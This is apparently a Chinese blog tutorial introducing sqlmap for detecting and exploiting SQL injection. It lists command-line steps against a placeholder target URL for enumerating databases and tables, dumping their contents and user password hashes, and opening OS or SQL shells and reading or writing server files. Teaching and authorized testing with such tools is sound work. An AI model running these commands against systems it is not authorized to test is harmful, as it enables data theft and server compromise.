SQLmap的“简单入门”

SQLmap工具简介

SQLmap就是一个自动化的工具,可以帮助我们完成繁杂的sql注入检测、sql注入攻击。因为如果人工去检测目标网站的注入点是非常耗时间的一件事,所以就有大牛们开发出这款自动化的攻击工具。

SQLmap的安装我就不提了,去搜索引擎找一下就有很多“手把手”教程。

关于SQLmap的使用

一、我们拿到目标的url,第一步就要判断该url是否存在sql注入点,能否发起sql注入获取数据

sqlmap.py -u 目标url

当注入点后面的参数大于或等于两个的时候,需要加上双引号

sqlmap.py -u "目标url"

注意:我们在返回的信息中有三处需要选择
(1)it looks like the back-end DBMS is “MySQL”. Do you want to skip test payloads specific for other DBMSes?
意思是检测到数据库可能是Mysql,是否需要跳过检测其他数据库。根据实际情况去选择
(2)for the remaining tests, do you want to include all tests for “MySQL” extending provide level (1) and risk(1) values?
意思是在“level1、risk1”的情况下,是否使用Mysql对应的所有payload进行检测。
(3)Get parameter “id” is vulnerable. Do you want to keep testing the others(if any)?
意思是参数ID存在漏洞,是否要继续检测其他参数。

二、既然我们判断出注入点,那么我们就去查询目标url使用的数据库

(1)查询当前用户的所有数据库

sqlmap.py -u 目标url --dbs 

(2)选择其中一个数据库获取表名

sqlmap.py -u 目标url -D 数据库名 --tables

(3)获取表中的字段

sqlmap.py -u 目标url -D 数据库名 -T 表名 --columns

(4)获取字段内容

sqlmap.py -u 目标url -D 数据库名 -T 表名 -C 字段名 --dump

(5)如果当前用户具有读取所有用户名的权限,那么可以使用下面命令进行获取

sqlmap.py -u 目标url --users

(6)同理具有相应的权限,可以获取用户密码表的数据

sqlmap.py -u 目标url --passwords

(7)获取当前网站数据库的名称

sqlmap.py -u 目标url --current-db

(8)获取当前网站数据库的用户名

sqlmap.py -u 目标url --current-user

SQLmap进阶使用

(1)–level 5:探测等级
(2)–is-dba:当前用户是否为管理员
(3)–roles:列出数据库管理员角色
(4)–referer:Http Referer头
(5)–sql-shell:进行自定义SQL语句
(6)–os-cmd,–os-shell:进行任意操作系统命令
(7)–file-read “文件地址”:从数据库服务器中读取文件
(8)–file-wirte “内容” --file-dest “目标地址”

好了,该去实践SQLmap的使用了,不要用于违法途径!!!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

AnQ_xiao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值